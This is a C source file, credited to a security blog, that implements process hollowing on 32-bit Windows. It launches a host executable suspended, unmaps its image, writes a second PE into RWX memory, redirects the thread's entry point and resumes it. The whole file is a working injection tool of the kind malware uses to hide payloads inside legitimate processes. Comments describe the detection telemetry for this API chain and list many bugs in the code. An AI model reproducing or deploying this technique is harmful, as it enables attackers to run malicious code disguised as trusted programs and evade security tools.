  1. /*
  2.  * Author: RubberDuck
  3.  * Webpage: https://bflow.security-portal.cz/spousteni-binarky-z-pameti-bez-nutnosti-ulozeni-na-disk/
  4.  */
  5. #include <Windows.h>
  6. #include <stdio.h>
  7.  
// Function-pointer type for ntdll!NtUnmapViewOfSection, which Windows.h does not
// declare; main() resolves the export at run time via GetProcAddress instead of
// importing it, so it does not appear in this binary's import table.
// NOTE(review): the typedef carries the same name as the native export, so any
// later declaration of the real function in this translation unit would collide.
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  9.  
/*
 * Entry point.
 *
 * argv[1] is launched in the suspended state, the image mapped at its current
 * ImageBase is unmapped, the PE file argv[2] is copied (headers, then each
 * section) into that address space, the child's ImageBase slot and the primary
 * thread's Eax are repointed at the replacement, and the thread is resumed.
 * From a defender's point of view this exact API chain against one child --
 * CreateProcess(CREATE_SUSPENDED) -> NtUnmapViewOfSection (resolved dynamically
 * from ntdll) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 * SetThreadContext -> ResumeThread -- is the telemetry pattern to alert on, and
 * the private RWX region holding a PE image in the child is what memory scanners
 * look for.
 *
 * The code is 32-bit only: it reads CONTEXT.Ebx/Eax and truncates pointers
 * through DWORD casts.  Return values of the remote-memory and thread calls are
 * not checked, so a failed step is reported as success by the printf that follows.
 *
 * Returns 0 in every case, including the usage error and any failed step.
 */
int main(int argc, char *argv[]){
  HANDLE hFile = NULL;
  DWORD dwRead = 0, dwSize = 0, dwImageBase = 0, i = 0;
  LPVOID pBuffer = NULL, pImageBase = NULL;
  TCHAR szFilePath[1024];                 // declared but never used
  PIMAGE_DOS_HEADER piDOSh = NULL;
  PIMAGE_NT_HEADERS piNTh = NULL;
  PIMAGE_FILE_HEADER piFileh = NULL;
  PIMAGE_OPTIONAL_HEADER piOptionalh = NULL;
  PIMAGE_SECTION_HEADER piSectionh = NULL;
  PROCESS_INFORMATION pi;
  STARTUPINFOA si;
  PCONTEXT pContext;
  NtUnmapViewOfSection funcNtUnmapViewOfSection;

  if(argc < 3){
    printf("Usage: %s <path>/<original.exe> <path>/<replace.exe>\n", argv[0]);
    return 0;
  }

  // Both out-structs are zeroed before CreateProcessA; nothing else in si is set.
  ZeroMemory(&si, sizeof(si));
  ZeroMemory(&pi, sizeof(pi));

  // argv[2] is the replacement image; it is only ever read into a local buffer.
  // dwFlagsAndAttributes and hTemplateFile are passed as NULL (i.e. 0).
  hFile = CreateFileA(argv[2],
            GENERIC_READ,
            FILE_SHARE_READ,
            NULL, OPEN_EXISTING,
            NULL, NULL);

  if(hFile != INVALID_HANDLE_VALUE){
    printf("[+] File %s opened\n", argv[2]);
    dwSize = GetFileSize(hFile, NULL);
    printf("[+] Filesize is %i bytes\n", dwSize);   // DWORD printed with %i

    // Whole file is read into a local read/write buffer in this process;
    // dwRead is captured but never compared with dwSize afterwards.
    pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if(pBuffer != NULL){
      ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL);
      printf("[+] Write file to memory address %p\n", pBuffer);
      piDOSh = (PIMAGE_DOS_HEADER) pBuffer;

      // Only the two magic values are validated; e_lfanew and the header
      // fields used below are taken from the file without bounds checks.
      if(piDOSh->e_magic == IMAGE_DOS_SIGNATURE){
        piNTh = (PIMAGE_NT_HEADERS)((DWORD)pBuffer + piDOSh->e_lfanew);
        printf("[+] DOS signature detected\n");

        if(piNTh->Signature == IMAGE_NT_SIGNATURE){
          printf("[+] PE signature detected\n");
          piOptionalh = (PIMAGE_OPTIONAL_HEADER)&(piNTh->OptionalHeader);
          piFileh = (PIMAGE_FILE_HEADER)&(piNTh->FileHeader);

          // The host (argv[1]) is started suspended so its primary thread has
          // not executed any user-mode code when its context is edited below.
          if(CreateProcessA(argv[1], NULL, NULL, NULL,
                            FALSE, CREATE_SUSPENDED,
                            NULL, NULL, &si, &pi)){

            printf("[+] New process %s created\n", argv[1]);

            // CONTEXT_FULL so that Ebx and Eax are populated by GetThreadContext.
            // The allocation is never released.
            pContext = (PCONTEXT) VirtualAlloc(NULL, sizeof(pContext),
                                               MEM_COMMIT, PAGE_READWRITE);
            pContext->ContextFlags = CONTEXT_FULL;

            if(GetThreadContext(pi.hThread, pContext)){
              printf("[+] Context obtained\n");
              // The 4 bytes at Ebx+8 in the child are treated as its current
              // ImageBase (see the printf); presumably Ebx points at the child's
              // PEB at this point -- the code does not verify that.
              ReadProcessMemory(pi.hProcess,
                                (LPCVOID)(pContext->Ebx + 8),
                                &dwImageBase, 4, NULL);

              printf("[+] Current ImageBase is on address 0x%.8x\n", dwImageBase);

              // Resolved at run time from ntdll; the C++-style functional cast
              // converts the FARPROC to the typedef'd pointer.  The NTSTATUS
              // it returns is discarded.
              funcNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                                              "NtUnmapViewOfSection"));
              funcNtUnmapViewOfSection(pi.hProcess, (PVOID)dwImageBase);

              printf("[+] Image unmapped\n");

              // Reserve+commit SizeOfImage bytes at the replacement's preferred
              // ImageBase, RWX.  No relocation handling exists, so this only
              // works if that exact address is free in the child.
              pImageBase = (LPVOID)VirtualAllocEx(pi.hProcess, (PVOID)piOptionalh->ImageBase,
                                                  piOptionalh->SizeOfImage,
                                                  MEM_COMMIT | MEM_RESERVE,
                                                  PAGE_EXECUTE_READWRITE);
              if(pImageBase != NULL){
                // Headers first (SizeOfHeaders bytes from the start of the file).
                WriteProcessMemory(pi.hProcess, pImageBase,
                                   pBuffer,
                                   piOptionalh->SizeOfHeaders,
                                   NULL);

                printf("[+] File headers are written\n");

                // Section table is located by arithmetic from e_lfanew +
                // sizeof(IMAGE_NT_HEADERS); that assumes SizeOfOptionalHeader
                // equals sizeof(IMAGE_OPTIONAL_HEADER), which is not checked.
                // Each section's raw bytes are copied to its VirtualAddress.
                for(i = 0; i < piFileh->NumberOfSections; i++){
                  piSectionh = (PIMAGE_SECTION_HEADER)((DWORD)pBuffer + piDOSh->e_lfanew +
                                                       sizeof(IMAGE_NT_HEADERS) +
                                                       i * sizeof(IMAGE_SECTION_HEADER));
                  WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)pImageBase + piSectionh->VirtualAddress),
                                     (LPVOID)((DWORD)pBuffer + piSectionh->PointerToRawData),
                                     piSectionh->SizeOfRawData, NULL);
                  // Name is an 8-byte field that need not be NUL-terminated;
                  // %s may read past it.
                  printf("[+] Section %s is written\n", piSectionh->Name);
                }

                // Same 4-byte slot read above, now overwritten with the
                // replacement's ImageBase.
                WriteProcessMemory(pi.hProcess, (LPVOID)(pContext->Ebx + 8),
                                   &(piOptionalh->ImageBase), 4, NULL);

                  printf("[+] New ImageBase is 0x%.8x\n", piOptionalh->ImageBase);

                // The suspended thread's Eax is repointed at the replacement's
                // entry point; the code relies on Eax being the start address
                // for a never-run x86 thread.
                pContext->Eax = (DWORD)pImageBase + piOptionalh->AddressOfEntryPoint;

                SetThreadContext(pi.hThread, pContext);
                printf("[+] Re-set thred context\n");
                ResumeThread(pi.hThread);
                printf("[+] Thred resumed\n", argv[2]);   // argv[2] has no specifier; ignored
              }
            }
          }
        }
      }

      // Only the local file buffer is released; pContext, pi.hProcess and
      // pi.hThread are never freed/closed.
      VirtualFree(pBuffer, 0, MEM_RELEASE);
    }

    CloseHandle(hFile);
  }

  // Blocks on stdin before exiting.
  getchar();

  return 0;
}
